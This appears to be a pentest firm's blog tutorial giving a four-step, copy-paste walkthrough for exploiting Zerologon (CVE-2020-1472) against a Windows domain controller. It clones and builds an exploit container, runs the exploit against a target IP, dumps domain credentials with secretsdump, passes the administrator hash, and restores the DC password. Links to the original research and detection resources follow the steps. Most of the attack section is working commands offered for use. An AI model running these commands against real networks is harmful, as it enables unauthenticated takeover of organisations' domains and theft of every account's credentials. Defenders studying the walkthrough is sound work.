How to exploit Zerologon (CVE-2020-1472)
A quick 4 step guide to exploitation
Recently, one of the most significant Microsoft Windows vulnerabilities since Eternal Blue (MS17-010) was brought to light. We’re going to show you how to exploit it during a pentest.
First, some context: In a recent paper written by the Secura team, a researcher detailed a vulnerability wherein it’s possible, without authentication, to take control of an entire Active Directory domain. Very few pre-existing criteria must be met prior to successful exploitation. The domain controller must be accessible, with Windows MS-NRPC services enabled.
The walkthrough below will show you how to exploit the Zerologon vulnerability to gain domain admin during a pentest. You’ll also see that the scripts detailed below include a check for exploitability and therefore prior scanning for the vulnerability is basically unnecessary.
Get the Tool
Following this discovery, let's look to exploit the vulnerability. From a Linux host or dropbox, clone the repo I’ve linked here:
puzzlepeaches/CVE-2020-1472
Requires the latest impacket from GitHub with added netlogon structures. Do note that by default this changes the password of the domain controller account. Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this!
https://github.com/puzzlepeaches/CVE-2020-1472
https://github.com/puzzlepeaches/CVE-2020-1472
git clone <https://github.com/puzzlepeaches/CVE-2020-1472>
cd CVE-2020-1472
Heads up, you need to have Docker installed prior to the use of this repository.
Then, find the domain controller on your target network and note its hostname and IP address. Build the Docker container from the repository you just cloned.
docker build . -t cve-2020-1472
You now have a Docker container containing the latest exploit code from @dirkjanm, and the latest version of Impacket.
Exploitation
The following assumptions will be made:
- Our domain controller has the hostname dc01.acmetestlab.local
- Our domain controller has the IP address, 172.16.0.3
Adjust your commands accordingly.
It’s important to follow the command format verbatim. Attempt to execute the exploitation process as quickly as possible to prevent issues caused by a desync between the local and domain password of the domain controller.
-
Run the command below to exploit the vulnerability.
docker run --net host cve-2020-1472:latest cve-2020-1472-exploit.py dc01 172.16.0.3
Successful exploitation should look like this:
This process may take longer than you expect. Be patient.
-
Run the following command to quickly perform a secretsdump using a null password to extract the machine password for your domain target
docker run --net host cve-2020-1472:latest secretsdump.py -just-dc -no-pass 'dc01$'@172.16.0.3
Successful exploitation should look like this:
This data includes all local administrator accounts and other domain accounts from your target domain controller.
-
Take the local administrator hash you just extracted and execute the previous command in the context of the new Administrator.
docker run --net host cve-2020-1472:latest secretsdump.py -just-dc -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe administrator@172.16.0.3
Alternatively, you can use a known DA account to use.
Once you have performed the second secretsdump, there will be a line that contains the string $MACHINE.ACC:plain_password_hex:. This is the hash you need to grab and reinstitute as the local machine password for your target domain controller.
The output from this command should look like this:
-
Once you have the DC machine account, set the machine password back to its original value. Run the command below, substituting the -hexpass value with your equivalent of the value highlighted in red above. Ensure that you use the line containing "plain_password_hex".
docker run --net host cve-2020-1472:latest restorepassword.py acme.local/dc01@dc01 -target-ip 172.16.0.3 -hexpass cee9895b43509ff16bb55c946f77bdeed09beb591939ce3596fa9117cc9731988168762c94f23ac520885f4d6605d45c55c6c8ab5...<SNIP>
The output from this command should look like this:
Post Exploitation
Once complete, you can use the previously extracted local-administrator hash to access the domain controller. For example, you can use the tool CrackMapExec to execute commands on the target.
Wrapping Up
You just owned a domain without credentials in about five minutes. Feels good, doesn't it? This is a significant vulnerability and all credit goes to researcher Tom Tervoort of Secura for discovering it.
dirkjanm/CVE-2020-1472
Requires the latest impacket from GitHub with added netlogon structures. Do note that by default this changes the password of the domain controller account. Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this!
https://github.com/dirkjanm/CVE-2020-1472
https://github.com/dirkjanm/CVE-2020-1472
In addition, we would like to show thanks to the original researcher and detection script. A link to both the paper and associated GitHub repository can be found here:
SecuraBV/CVE-2020-1472
A Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472). It attempts to perform the Netlogon authentication bypass. The script will immediately terminate when successfully performing the bypass, and not perform any Netlogon operations.
https://github.com/SecuraBV/CVE-2020-1472
https://github.com/SecuraBV/CVE-2020-1472
Some great resources on detection are available in a GitHub repo posted by the nccgroup. Follow this link to check it out.
nccgroup/nccfsas
This is an exploit for CVE-2020-1472, a.k.a. Zerologon. This tool exploits a cryptographic vulnerability in Netlogon to achieve authentication bypass. Ultimately, this allows for an attacker to reset the machine account of a target Domain Controller, leading to Domain Admin compromise.
https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon#detection
https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon#detection
Continuous Human & Automated Security
The Expert-Driven Offensive
Security Platform
Continuously monitor your attack surface with advanced change detection. Upon change, testers and systems perform security testing. You are alerted and assisted in remediation efforts all contained in a single security application, the Sprocket Platform.
Expert-Driven Offensive Security Platform
- Attack Surface Management
- Continuous Penetration Testing
- Adversary Simulations